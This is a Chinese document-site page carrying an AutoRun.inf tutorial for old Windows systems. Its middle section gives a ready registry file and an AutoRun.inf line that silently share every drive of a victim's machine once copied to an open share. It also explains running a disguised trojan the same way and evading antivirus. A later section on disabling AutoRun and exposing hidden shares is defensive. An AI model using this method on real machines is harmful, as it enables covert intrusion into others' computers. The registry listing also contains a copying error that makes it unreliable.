ImageVerifierCode 换一换
格式:DOC , 页数:10 ,大小:74.04KB ,
资源ID:8191369      下载积分:8 金币
快捷注册下载
登录下载
邮箱/手机:
温馨提示:
快捷下载时,用户名和密码都是您填写的邮箱或者手机号,方便查询和重复下载(系统自动生成)。 如填写123,账号就是123,密码也是123。
特别说明:
请自助下载,系统不会自动发送文件的哦; 如果您已付费,想二次下载,请登录后访问:我的下载记录
支付方式: 支付宝    微信支付   
验证码:   换一换

开通VIP
 

温馨提示:由于个人手机设置不同,如果发现不能下载,请复制以下地址【https://www.zixin.com.cn/docdown/8191369.html】到电脑端继续下载(重复下载【60天内】不扣币)。

已注册用户请登录:
账号:
密码:
验证码:   换一换
  忘记密码?
三方登录: 微信登录   QQ登录  

开通VIP折扣优惠下载文档

            查看会员权益                  [ 下载后找不到文档?]

填表反馈(24小时):  下载求助     关注领币    退款申请

开具发票请登录PC端进行申请

   平台协调中心        【在线客服】        免费申请共赢上传

权利声明

1、咨信平台为文档C2C交易模式,即用户上传的文档直接被用户下载,收益归上传人(含作者)所有;本站仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。所展示的作品文档包括内容和图片全部来源于网络用户和作者上传投稿,我们不确定上传用户享有完全著作权,根据《信息网络传播权保护条例》,如果侵犯了您的版权、权益或隐私,请联系我们,核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
2、文档的总页数、文档格式和文档大小以系统显示为准(内容中显示的页数不一定正确),网站客服只以系统显示的页数、文件格式、文档大小作为仲裁依据,个别因单元格分列造成显示页码不一将协商解决,平台无法对文档的真实性、完整性、权威性、准确性、专业性及其观点立场做任何保证或承诺,下载前须认真查看,确认无误后再购买,务必慎重购买;若有违法违纪将进行移交司法处理,若涉侵权平台将进行基本处罚并下架。
3、本站所有内容均由用户上传,付费前请自行鉴别,如您付费,意味着您已接受本站规则且自行承担风险,本站不进行额外附加服务,虚拟产品一经售出概不退款(未进行购买下载可退充值款),文档一经付费(服务费)、不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
4、如你看到网页展示的文档有www.zixin.com.cn水印,是因预览和防盗链等技术需要对页面进行转换压缩成图而已,我们并不对上传的文档进行任何编辑或修改,文档下载后都不会有水印标识(原文档上传前个别存留的除外),下载后原文更清晰;试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓;PPT和DOC文档可被视为“模板”,允许上传人保留章节、目录结构的情况下删减部份的内容;PDF文档不管是原文档转换或图片扫描而得,本站不作要求视为允许,下载前可先查看【教您几个在下载文档中可以更好的避免被坑】。
5、本文档所展示的图片、画像、字体、音乐的版权可能需版权方额外授权,请谨慎使用;网站提供的党政主题相关内容(国旗、国徽、党徽--等)目的在于配合国家政策宣传,仅限个人学习分享使用,禁止用于任何广告和商用目的。
6、文档遇到问题,请及时联系平台进行协调解决,联系【微信客服】、【QQ客服】,若有其他问题请点击或扫码反馈【服务填表】;文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“【版权申诉】”,意见反馈和侵权处理邮箱:1219186828@qq.com;也可以拔打客服电话:0574-28810668;投诉电话:18658249818。

注意事项

本文(2024年AutoRuninf完全教程.doc)为本站上传会员【快乐****生活】主动上传,咨信网仅是提供信息存储空间和展示预览,仅对用户上传内容的表现方式做保护处理,对上载内容不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知咨信网(发送邮件至1219186828@qq.com、拔打电话4009-655-100或【 微信客服】、【 QQ客服】),核实后会尽快下架及时删除,并可随时和客服了解处理情况,尊重保护知识产权我们共同努力。
温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载【60天内】不扣币。 服务填表

2024年AutoRuninf完全教程.doc

1、最近网上流行通过AutoRun.inf文献使对方所有的硬盘完全共享或中木马的措施,因为AutoRun.inf文献在黑客技术中的应用还是极少见的,对应的资料也不多,有诸多人对此以为很神秘,本文试图为您解开这个迷,使您能完全的了解这个并不复杂却极其有趣的技术。   一、理论基础   常常使用光盘的朋友都懂得,有诸多光盘放入光驱就会自动运行,它们是怎么做的呢?光盘一放入光驱就会自动被执行,重要依托两个文献,一是光盘上的AutoRun.inf文献,另一个是操作系统自身的系统文献之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作,假如有的话,便开始寻找光盘根目录下的Au

2、toRun.inf文献。假如存在AutoRun.inf文献则执行它里面的预设程序。   AutoRun.inf不光能让光盘自动运行程序,也能让硬盘自动运行程序,措施很简单,先打开记事本,然后用鼠标右键点击该文献,在弹出菜单中选择“重命名”,将其更名为AutoRun.inf,在AutoRun.inf中键入如下内容:   [AutoRun]    //表示AutoRun部分开始,必须输入   Icon=C:\C.ico  //给C盘一个个性化的盘符图标C.ico   Open=C:\1.exe  //指定要运行程序的途径和名称,在此为C盘下的1.exe   保存该文献,按F5刷新桌面,

3、再看“我的电脑”中的该盘符(在此为C盘),你会发觉它的磁盘图标变了,双击进入C盘,还会自动播放C盘下的1.exe文献!   解释一下:“[AutoRun]”行是必须的固定格式,“Icon”行对应的是图标文献,“C:\C.ico”为图标文献途径和文献名,你在输入时能够将它改为你的图片文献所在途径和文献名。另外,“.ico”为图标文献的扩展名,假如你手头上没有此类文献,能够用看图软件ACDSee将其他格式的软件转换为ico格式,或者找到一个后缀名为BMP的文献,将它直接更名为ICO文献即可。   “Open”行指定要自动运行的文献及其盘符和途径。要尤其阐明的是,假如你要变化的硬盘跟目录下没有自

4、动播放文献,就应当把“OPEN”行删掉,否则就会因为找不到自动播放文献而打不开硬盘,此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。   请大家注意:保存的文献名必须是“AutoRun.inf”,编制好的Autorun.inf文献和图标文献一定要放在硬盘根目录下。更深入,假如你的某个硬盘内容暂时比较固定的话,不妨用Flash做一个自动播放文献,再编上“Autorun”文献,那你就有最酷、最个性的硬盘了。   到这儿还没有完。大家懂得,在某些光盘放入后,我们在其图标上单击鼠标右键,还会产生一个具备特色的目录菜单,假如能对着我们的硬盘点击鼠标右键也产生这么的效果,那将愈加的有特色。其实,

5、光盘能有这么的效果也仅仅是因为在AutoRun.inf文献中有如下两条语句:   shell\标志=显示的鼠标右键菜单中内容   shell\标志\command=要执行的文献或命令行   因此,要让硬盘具备特色的目录菜单,在AutoRun.inf文献中加入上述语句即可,示例如下:   shell\1=天若有情天亦老   shell\1\command\=notepad ok.txt   保存完成,按F5键刷新,然后用鼠标右键单击硬盘图标,在弹出菜单中会发觉“天若有情天亦老”(图1),点击它,会自动打开硬盘中的“ok.txt”文献。注意:上面示例假设“ok.txt”文献在硬盘根

6、目录下,notepad为系统自带的记事本程序。假如要执行的文献为直接可执行程序,则在“command\”后直接添加该执行程序文献名即可。  二、实例   下面就举个例子:假如你扫到一台开着139共享的机器,而对方只完全共享了D盘,我们要让对方的所有驱动器都共享。首先编辑一个注册表文献,打开记事本,键入如下内容:   REGEDIT4   '此处一定要空一行   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]   "Path"="C:\\"   "Remark"=

7、""   "Type"=dword:00000000   "Flags"=dword:00000302   "Parmlenc"=hex:   "Parm2enc"=hex:   [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]   "Path"="D:\\"   "Remark"=""   "Type"=dword:00000000   "Flags"=dword:00000302   "Parmlenc"=hex:   "Parm2enc"=hex:   

8、[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]   "Path"="E:\\"   "Remark"=""   "Type"=dword:00000000   "Flags"=dword:00000302   "Parmlenc"=hex:   "Parm2enc"=hex:   以上我只设置到E盘,假如对方有诸多逻辑盘符的请自行设置。将以上部分另存为Share.reg文献备用。要尤其注意REGEDIT4为大写且顶格书写,其后要空上一行,在最后一行记得要按一次回车键。

9、   然后打开记事本,编制一个AutoRun.inf文献,键入如下内容:   [AutoRun]   Open=regedit/s Share.reg   //加/s参数是为了导入时不会显示任何信息   保存AutoRun.inf文献。将Share.reg和AutoRun.inf这两个文献都复制到对方的D盘的根目录下,这么对方只要双击D盘就会将Share.reg导入注册表,这么对方电脑重启后所有驱动器就会都完全共享出来。   假如想让对方中木马,只要在AutoRun.inf文献中,把“Open=Share.Reg”改成“Open=木马服务端文献名”,然后把AutoRun.inf和配备

10、好的木马服务端一起复制到对方D盘的根目录下,这么不需对方运行木马服务端程序,而只需他双击D盘就会使木马运行!这么做的好处显而易见,那就是大大的增加了木马运行的积极性!须知许多人目前都是非常警觉的,不熟悉的文献他们轻易的不会运行,而这种措施就极难防范了。   要阐明的是,给你下木马的人不会那么蠢的不给木马加以伪装,一般说来,他们会给木马服务端文献改个名字,或好听或和系统文献名很相像,然后给木马换个图标,使它看起来像TXT文献、ZIP文献或图片文献等,,最后修改木马的资源文献使其不被杀毒软件识别(详细的措施能够看本刊此前的文章),当服务端用户信以为真时,木马却悄悄侵入了系统。其实,换个角度了解就

11、不难了——要是您给他人下木马我想你也会这么做的。以上伎俩再辅以如上内容的AutoRun.inf文献就天衣无缝了!  三、防范措施   共享分类完全是由flags标志决定的,它的键值决定了共享目录的类型。当flags=0x302时,重新开启系统,目录共享标志消失,表面上看没有共享,实际上该目录正处在完全共享状态。网上流行的共享蠕虫,就是利用了此特性。假如把"Flags"=dword:00000302改成"Flags"=dword:00000402,就能够看到硬盘被共享了,明白了吗?秘密就在这里!   以上代码中的Parmlenc、Parm2enc属性项是加密的密码,系统在加密

12、时采取了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算,要想求出密码再进行一次异或运算,然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的,在局域网内从一台机器上能够看到另一台计算机的共享密码。   利用TCP/IP协议设计的NethackerⅡ软件能够穿过Internet网络,找到共享的主机,然后进行对应操作。因此当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方了。   处理措施是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer

13、sion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除,它是Microsoft网络上的文献与打印机共享虚拟设备驱动程序,再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉,就会很安全了。   另外,关闭硬盘AutoRun功效也是防范黑客入侵的有效措施之一。详细措施是在“开始”菜单的“运行”中输入Regedit,打开注册表编辑器,展开到HKEY_CURRENT_USER\Software\Microsoft

14、\Windows\CurrentVersion\Policies\Exploer主键下,在右侧窗格中找到“NoDriveTypeAutoRun”,就是这个键决定了是否执行CDROM或硬盘的AutoRun功效。   双击“NoDriveTypeAutoRun”,在默认状态下(即你没有严禁过AutoRun功效),在弹出窗口中能够看到“NoDriveTypeAutoRun”默认键值为95,00,00,00,如图所示(图2)。其中第一个值“95”是十六进制值,它是所有被严禁自动运行设备的和。将“95”转为二进制就是10010101,其中每位代表一个设备,Windows中不一样设备会用如下数值表示:

15、 图 2   设备名称     第几位 值 设备用如下数值表示  设备名称含义   DKIVE_UNKNOWN    0  1  01h         不能识别的设备类型   DRIVE_NO_ROOT_DIR  1  0  02h         没有根目录的驱动器(Drive without root directory)   DRIVE_REMOVABLE  2  1  04h         可移动驱动器(Removable drive)   DRIVE_FIXED    3  0  08h         固定的驱动器(Fixed drive)    DRI

16、VE_REMOTE     4  1  10h         网络驱动器(Network drive)   DRIVE_CDROM    5  0  20h         光驱(CD-ROM)     DRIVE_RAMDISK    6  0  40h         RAM磁盘(RAM Disk)   保存         7  1  80h         未指定的驱动器类型(Not yet specified drive disk)   在上面所列的表中值为“0”表示设备运行,值为“1”表示该设备不运行(默认情况下,Windows严禁80h、10h、4h、01h这些设备自

17、动运行,这些数值累加恰好是十六进制的95h,因此NoDriveTypeAutoRun”默认键值为95,00,00,00)。   由上面的分析不难看出,在默认情况下,会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保存设备,因此要严禁硬盘自动运行AutoRun.inf文献,就必须将DRIVE_FIXED的值设为1,这是因为DRIVE_FIXED代表固定的驱动器,即硬盘。这么一来,本来的10010101(在表中“值”列中由下向上看)就变成了二进制的10011101,转为十六进制为9D。目前,将“NoDri

18、veTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器,重启电脑后就会关闭硬盘的AutoRun功效。   假如你看明白了,那你肯定懂得该怎样严禁光盘AutoRun功效了,对!就是将DRIVE_CDROM设为1,这么“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101,也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器,重启电脑后就会关闭CDROM的Autorun功效。假如仅想严禁软件光盘的AutoRun功效,但又保存对CD音频碟的自动播放能力,这时只需将“NoDriveTypeAutoRun”的键值改为:BD,00,00,00即可

19、   假如想要恢复硬盘或光驱的AutoRun功效,进行反方向操作即可。   实际上,大多数的硬盘根目录下并不需要AutoRun.inf文献来运行程序,因此我们完全能够将硬盘的AutoRun功效关闭,这么虽然在硬盘根目录下有AutoRun.inf这个文献,Windows也不会去运行其中指定的程序,从而能够达成预防黑客利用AutoRun.inf文献入侵的目标。   除此以外,我们还应让Windows能显示出隐藏的共享。大家都懂得,在Windows 9X中设置共享时,通过在共享名后加上“$”这个符号,可使共享隐藏。例如,我们给一个名为share的计算机的C盘设置共享时,只要将其共享名设为C$

20、这么我们将看不到被共享的C盘,只有通过输入该共享确实切途径,才能访问此共享。不过我们只要用将电脑中的msnp32.dll文献稍做修改。就能够让Windows显示出隐藏的共享。   因为在Windows下msnp32.dll会被调用,不能直接修改此文献,因此第一步我们要复制msnp32.dll到C盘下并更名为msnp32,msnp32.dll在C:\Windows\system文献夹下。运行UltraEdit等十六进制文献编辑器打开msnp32,找到“24 56 E8 17”(位于偏移地址00003190~000031A0处),找到后将“24”改为“00”,然后保存,关闭UltraEdit。

21、重启计算机进入DOS模式,在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll,重启进入Windows,目前双击share就能看见被隐藏的共享了。   最后要提示大家利用TCP/IP协议设计的NethackerⅡ等黑客软件能够穿过Internet网络,找到共享的主机,然后进行对应操作。因此当您通过Modem上网时,千万要小心,因为一不小心,您的主机将完全共享给对方了。防范此类事情发生的措施无非是常常检查系统,给系统打上补丁,常常使用反黑杀毒软件,上网时打开防火墙,注意异常现象,留心AutoRun.inf文献的内容,关闭共享或不要设置为完全共享,且加上复杂的共享密码。   申明:本文的目标是使大家能清楚地了解网上流行的黑客伎俩,增强自己的防护意识,因此请大家不要用本文的措施去干违法的事情,切记:己所不欲,勿施于人!

移动网页_全站_页脚广告1

关于我们      便捷服务       自信AI       AI导航        抽奖活动

©2010-2025 宁波自信网络信息技术有限公司  版权所有

客服电话:0574-28810668  投诉电话:18658249818

gongan.png浙公网安备33021202000488号   

icp.png浙ICP备2021020529号-1  |  浙B2-20240490  

关注我们 :微信公众号    抖音    微博    LOFTER 

客服